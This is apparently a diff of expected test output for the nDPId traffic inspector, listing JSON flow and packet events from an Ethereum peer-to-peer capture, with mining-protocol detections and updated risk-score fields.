+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364841,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADcGsuQiYawWwKgBuHZf3SnE3x7vnZqFEqAS\/ojiZQAAAgQFrAQCCAoxzJM4ItiUTwEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364841,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqezAqAG4ImGsFt0pdl+dmoUSxN8e8IAQECz+XAAAAQEICiLYlXkxzJM4"}
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1578508364862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGeCSlFmshwKgBuHZf3SJnRYz4cyqhtKAScSBl3gAAAgQFrAQCCAo1gVUZItiUTwEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1578508364862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGaCzAqAG4pRZrId0idl9zKqG0Z0WM+YAQECz0WAAAAQEICiLYlY01gVUZ"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1578508364877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364877,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACEGk4U0u88bwKgBuHZf3S3Pd7n11PppgaAS\/oiD+wAAAgQFoAQCCApvJb2EItiUTwEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1578508364877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364877,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGdI3AqAG4NLvPG90tdl\/U+mmBz3e59oAQEAmf6AAAAQEICiLYlZpvJb2E"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364922,"flow_last_seen":1578508364922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508364922,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1578508364922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508364922,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+OGAAAAgQFtAEDAwUBAQgKItiVxAAAAAAEAgAA"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364924,"flow_last_seen":1578508364924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508364924,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1578508364924,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508364924,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtY\/AqAG40frwzd0+dl+QvttrAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKItiVxgAAAAAEAgAA"}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1578508364925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508364925,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHG4wAAEARgdzAqAG4I7T2qXZfdl0As6VnAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","ndpi": {"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364932,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGkHGfy1QfwKgBuHZf3TprW2X93LDPrKAScSCdQwAAAgQFrAQCCApPeKo9ItiVagEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGhHnAqAG4n8tUH906dl\/csM+sa1tl\/oAQECwsmQAAAQEICiLYlc1PeKo9"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364932,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508364932,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvd3AqAG4Etunn90\/dl9+5\/UeAAAAALAC\/\/851wAAAgQFtAEDAwUBAQgKItiVzQAAAAAEAgAA"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 01870{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1578508364954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ91J1AACwRmVQjtPapwKgBuHZddl8EKaTIL6PiPVD76wxxux15bHRlnSs2av4nBFSV7v4bhHiIpeAMxLmbK8f6wiaJfQicCaKdl2RU3riNA4G85e32CrySn3+r4nugeiGUNmLmJTGwe70KAk\/1yl9pMbVr5iHiC9EbAQT5A7z5A7T4TYSnVnoygnZfgnZfuECQJNyxBglNPC+n9m4t\/W08TtywpdWYdWjkRxmhkajaDCz+gK\/mbTitDTyIYj\/DM6dFql13rAhhOsl+TepFcV7R+E2EVmvzPoJ2X4J2X7hAs1lDgaitKFA3cxLdFsLwt7VebQyms4a6o\/fivZtKo8AkJ6dL4w4Dn4+\/vC\/\/JsKeSIScYYBOpqnxxVMZ+XWFxvhNhIui\/9KCdl+Cdl+4QKesUvPGk3pcExPSpjjyYak+S\/zgRaKyCtkCAnADlTupsK\/kU6vbTyjVeYLvjRqhlLfuaobh1XsP1yYWbMEwCkP4TYROL5ObgnZfgnZfuEBjjxCUsfvwMHRxTE5YrP7+ISCuREmPbKrzjoabqIoNEUz\/YRnAV2w6k47DZjKIksCMD5bt88unhn0EsLYp\/SzX+E2EXkQ3ooJ2X4J2X7hAPuP3gMJbiMdT+jVwpl443XaSBNUfQ0qZUmbru+9L8er4h7zKFM+7c1K4WVxLv0mgiZa++5g5WXQyn8nQTgubb\/hNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYQj6yXYgnZfgnZfuEC5nQSZ\/xzD17vSEoHg\/jtmGLuRaM3q97\/3Czva8FggRyrw44MHO8OtruMk8OoTJc88hHmdKvMBoeGC+K0eEhFi+E2Ep1ZKIYJ2XYJ2XbhAYZoPsgtYlBM737vFkYUTo\/9EphiWRNvy3F9PFQKE60Wg2vh7fDKeVFJ2s+C3+rlsvule\/8FMZch7lhCdhu+rUPhNhJ3mmFeCdl+Cdl+4QGQs+WUN2IadQlJdv2hYAS47TWT0deczhHq293QjQaQ5dBSGXZU4dOj17ZGw5OHFM97hStHWuydqVFmyRxRg\/w34TYQ050sDgsVJgsVJuEDzSXu93jNII3idYaebqM1QwrATGCoZMfOLWHKo8\/HNEvGmOW1TsZdycKJciiZgh6ud1sRz67L9tP+HeODfKFTV+E2EDfsOx4J2X4J2X7hAH7mV1eGOz5WoeIocWFwRYF7ZVBDRcdtaFFH5u23BFJ62FH1ch71cEmxc8OtYpiPqb2N3y6mQjsQPeWAgtQws9vhNhCPknjSCdl+Cdl+4QFeAPtyTjNbAmZsxJ+YSStMfUptpi+Ck9CtWlo\/Fnkmot5zzhg4wYebjEaqIDMNNKgYreTwT+o6X4euclIzcKBSEXhYgYA=="}
 01010{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1578508364954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHF1J5AACwRm8sjtPapwKgBuHZddl8BsQR1SNeP1ZrG\/ZwtEcGW5vGA0sDGp78prdWhxHtDqEDU7PNKL6kZEdICkE\/ClTr5riDvJ\/S0Juy5pZvsiDZ34LyanRNXXRjpzjohXnlvDARKWl\/FPyuFUx\/5q7iG79kKNiaGAAT5AUT5ATz4TYS5GczRgm\/xgm\/xuEBa13f1PeAY+pXn+QDG2H2vRnbUjALc47yKM1DGaLaCBXAmqDZbTzNfSqGBTAVPFFnsJtnCFC0Fv0w0bIIRmdWp+E2EijsROoJ2X4J2X7hAJi3PrTUi8k0+hp72TGveiEIya6qIgjO27CDPgcM2XClPC4ML\/96HDCNIKvA6L6b3KKoTFoGm44u2hTJ2hJ9PJvhNhM+0ztiCdl+Cdl+4QCCTHaJCBMKOiAeM0+J0ILaNmDQGKBpq95aDifzAyS6BBPIijEGzkyTvF6L1V27y7PdVSWOVkbAaliLEx1mlVCv4TYRf2EBxgnX+gnX+uEAuHZY2QcmV8WQCz4M\/VG5LfG7tHam\/sFovnjhq\/yEXmxTFgIMHUbncizgn1Jn7XeiL7CoOoCVHxB7uvvn28VO3hF4WIGA="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1578508364957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364957,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGw5PR+vDNwKgBuHZf3T7\/g0hGkL7bbKAScSAsgwAAAgQFrAQCCAoN8FcJItiVxgEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1578508364957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364957,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtZvAqAG40frwzd0+dl+Qvtts\/4NIR4AQECy8HAAAAQEICiLYleUN8FcJ"}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1578508364990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364990,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGxNei5B2gwKgBuHZf3TsLfbp+uLewXqAScSA1yAAAAgQFrAQCCArR1xFdItiVcAEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1578508364990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364990,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGt9\/AqAG4ouQdoN07dl+4t7BeC326f4AQECzE7QAAAQEICiLYlgPR1xFd"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365009,"flow_last_seen":1578508365009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365009,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1578508365009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365009,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGb3XAqAG4kFt4h91Bdl90OGLhAAAAALAC\/\/+IEgAAAgQFtAEDAwUBAQgKItiWFAAAAAAEAgAA"}
